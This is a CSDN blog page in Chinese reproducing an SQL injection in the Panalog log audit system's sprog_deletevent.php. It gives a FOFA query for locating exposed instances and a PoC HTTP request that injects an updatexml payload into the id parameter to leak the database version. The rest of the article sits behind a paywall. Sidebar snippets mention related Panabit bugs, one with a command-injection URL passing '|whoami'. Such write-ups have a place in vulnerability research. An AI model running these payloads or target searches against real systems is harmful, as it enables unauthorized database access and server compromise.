Panalog 日志审计系统 sprog_deletevent.php SQL 注入漏洞复现

最新推荐文章于 2024-05-08 04:33:01 发布

0xSecl

最新推荐文章于 2024-05-08 04:33:01 发布

阅读量1.2k

点赞数 12

分类专栏：漏洞复现文章标签： php 安全 web安全

本文链接：https://blog.csdn.net/qq_41904294/article/details/134908059

版权

漏洞复现专栏收录该内容

963 篇文章 1580 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了Panalog大数据日志审计系统的SQL注入漏洞，详细阐述了漏洞概述、复现环境及复现过程。通过0x04章节的PoC演示了如何查询数据库版本，同时提供了修复建议，包括预编译SQL语句和部署Web应用防火墙，以防止敏感信息泄露和进一步的安全风险。

摘要由CSDN通过智能技术生成

0x01 产品简介

Panalog大数据日志审计系统定位于将大数据产品应用于高校、公安、政企、医疗、金融、能源等行业之中，针对网络流量的信息进行日志留存，可对用户上网行为进行审计，逐渐形成大数据采集、大数据分析、大数据整合的工作模式，为各种网络用户提供服务。

0x02 漏洞概述

Panabit /Maintain/sprog_deletevent.php 文件的 id 参数存在 SQL 注入漏洞，可导致数据库信息泄露从而获取敏感信息，甚至可能被攻击者进一步利用造成更大危害。

0x03 复现环境

FOFA：app="Panabit-Panalog" && port="8012"

0x04 漏洞复现

PoC

GET /Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(select+version%28%29)),0)&cloudip=1 HTTP/1.1
Host: your-ip
User-Agent: Mo

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

12
点赞
踩
9

收藏

觉得还不错? 一键收藏
打赏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

panabit日志审计系统sprog_upstatus接口处SQL注入漏洞复现 [附POC]

薛定谔嘚喵博客

08-01

331

Panabit日志审计系统接口sprog_upstatus存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息等）。

redaxo_sprog:更换占位符

05-09

幽灵语言附加占位符轻松创建占位符及其替换一种语言可以使用另一种语言的替代（基于语言的语言）应用占位符的创建无需打开或关闭标签即可完成。例子platzhalter代码中的占位符（类，函数，模板，模块等）的注释位于...

1 条评论您还未登录，请先登录后发表或查看评论

【漏洞复现】panalog日志审计系统任意用户创建漏洞和后台命令执行

失心少年

10-23

806

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！panalog为北京派网软件有限公司，一款流量分析，日志分析管理的一款软件。存在任意用户创建漏洞和后台命令执行漏洞，可先通过任意用户创建，然后进行后台命令执行，获取服务器权限。

RabbitMQ【部署 01】一篇学会RabbitMQ服务依赖的下载安装及简单使用（首次登录 User can only log in via localhost 问题处理）(1)

最新发布

2301_77121488的博客

05-08

1057

也可以直接安装rabbitmq-server从报错信息里获取需要的版本，由于是同一个网站，下载的方式是一样的，这次也是直接下载安装文件。，朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》，可以扫描下方二维码领取（如遇扫码问题，可以在评论区留言领取哦）~此时服务已经可以使用了，但是，默认情况下，RabbitMQ是没有安装WEB端插件的，需要手动积获才可以生效。点击下载，可以进行联网下载安装也可以直接进行下载，本次选择直接下载安装文件。因篇幅有限，仅展示部分资料。还有大家最喜欢的黑客技术。

Panalog 日志审计系统 libres_syn_delete.php 前台RCE漏洞复现

0xSec

02-16

1109

Panalog日志审计系统 libres_syn_delete.php接口处存在远程命令执行漏洞，攻击者可执行任意命令，接管服务器权限。

Panalog大数据日志审计系统libres_syn_delete.php存在命令执行漏洞

做自己喜欢的事，并将其发挥到极致！

02-19

886

Panalog大数据日志审计系统定位于将大数据产品应用于高校、公安、政企、医疗、金融、能源等行业之中，针对网络流量的信息进行日志留存，可对用户上网行为进行审计，逐渐形成大数据采集、大数据分析、大数据整合的工作模式，为各种网络用户提供服务。

linux的scp命令怎么用_linux的grep命令用法.docx

11-08

* 对于一些常用的字符集，系统做了定义：[A-Za-z] 等价于 [[:alpha:]] * [0-9] 等价于 [[:digit:]] * [A-Za-z0-9] 等价于 [[:alnum:]] * 空白字符 [[:space:]] * 标点符号 [[:punct:]] 匹配次数： * {m，n} 匹配其...

Wivuu.Sprog：Sprog（丹麦语为“ Language”）字符串解析库

02-04

为C＃7+和.NET Core编写的Sprog（丹麦语，“ Language”）跨平台字符串解析库。用法解析一个简单的标识符 Parser TakeIdentifier ( string input , out string _id ) => new Parser ( input ) . Skip ( ...

Sprog-开源

07-19

标题中的"Sprog-开源"揭示了我们正在讨论的是一款名为Sprog的开源软件。开源意味着该软件的源代码是公开的，允许用户查看、修改和分发代码，以适应他们的特定需求或贡献改进。这样的软件通常由全球社区的开发者协作...

Video5.Demo3.Duplex

10-08

双工通信是指在两个方向上同时进行数据传输的能力，是现代通信系统中的基础组成部分。在此视频演示中，可能详细展示了双工通信的工作原理、优势以及不同类型的双工模式。描述中的 "Video5.Demo3.Duplex" 仅提供了...

panalog 日志管理系统

12-23

panalog 配合panabit 的日志管理查询记录用户行为日志系统满足网安的要求是运营商必选的系统

linux导出日志关键字数据_Linux版本的Panalog大数据日志分析系统正式公测

weixin_39856208的博客

11-10

931

Panalog的Linux版本正式公测大家好，相信了解派网的小伙伴们最近已经发现了，自Panabit智能应用网关软件的Linux版本发布后，在部署上增加了非常大的灵活性和适用性。而今天给大家带来的是，Panalog的Linux版本，为了让大家能够尽快上手体验，下面直接介绍Linux版本的详细部署步骤。由于是公测，为了方便大家反馈问题，请小伙伴们扫描文章最后的微信二维码加群进行问题的反馈...

【1day】Panabit 日志系统openid接口SQL注入漏洞

记录并分享学习安全的知识点..

12-05

1206

Panalog是一款日志系统，方便用户统一集中监控、管理在网的海量设备。Panabit 日志系统openid接口存在SQL注入漏洞，攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码，从而在后台数据库中执行未经授权的操作。

Panabit-Panalog ipgrp_handle SQL注入漏洞

qq_45936921的博客

01-03

799

Panabit-Panalog日志系统后台 ipgrp_handle.php接口存在SQL注入漏洞，攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限

【1day】Panabit 日志系统sy_addmount.php文件命令执行漏洞学习

记录并分享学习安全的知识点..

12-11

752

Panalog是一款日志系统，方便用户统一集中监控、管理在网的海量设备。Panabit 日志系统sy_addmount.php文件存在命令执行漏洞，攻击者通过漏洞可以执行任意命令获取服务器权限。

Panalog大数据日志审计系统libres_syn_delete.php命令执行漏洞

败在我手中之敌，从来不会被我视为对手，我给你时间追赶，直至你遥望不见。

02-25

265

有了这个网络安全面试题，面试就像开了挂！（附PDF）

lvaolan的博客

02-26

1127

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！内容实在太多，不一一截图了。

panabit部署模式

Goallegoal的博客

04-20

2116

panabit 部署模式路由模式 panabit 此时外接互联网，内接内网，相当于一个路由器的功能，除了转发数据流外，还可以部署 NAT。因为内网的流量需要经过 panabit，所以可以起到监管流量的作用。网桥模式相较上一幅拓扑多了一台网关，来承担路由功能，panabit 此时相当于一台交换机，只负责流量监管。当客户的网络已经搭建好，不想改变原本的网络拓扑的网段设计时，可以将 panab...

ucos linux 内存管理,ucosII在动态内存管理漏洞

weixin_36432875的博客

05-02

190

【实例简介】本例发现了ucosII在动态内存管理方面的漏洞，动态内存块可以归还到不同的内存分区。【实例截图】TEST交叉使用.C【核心代码】panalog = (ANALOG *)OSMemGet(BnaPtr, &err);if (err == OS_NO_ERR){panalog->ticks = OSTimeGet();panalog->channel = 10;pa...

Panabit存在命令执行漏洞

weixin_51387754的博客

11-04

3291

漏洞简介 Panabit是以DPI、DFI为基础，融合多项识别技术的一款基于应用层流量管理的流控系统。漏洞复现 fofa语句：“panabit” && server==“nginx” https://x.x.x.x:4433/account/sy_addmount.php?username=|whoami ...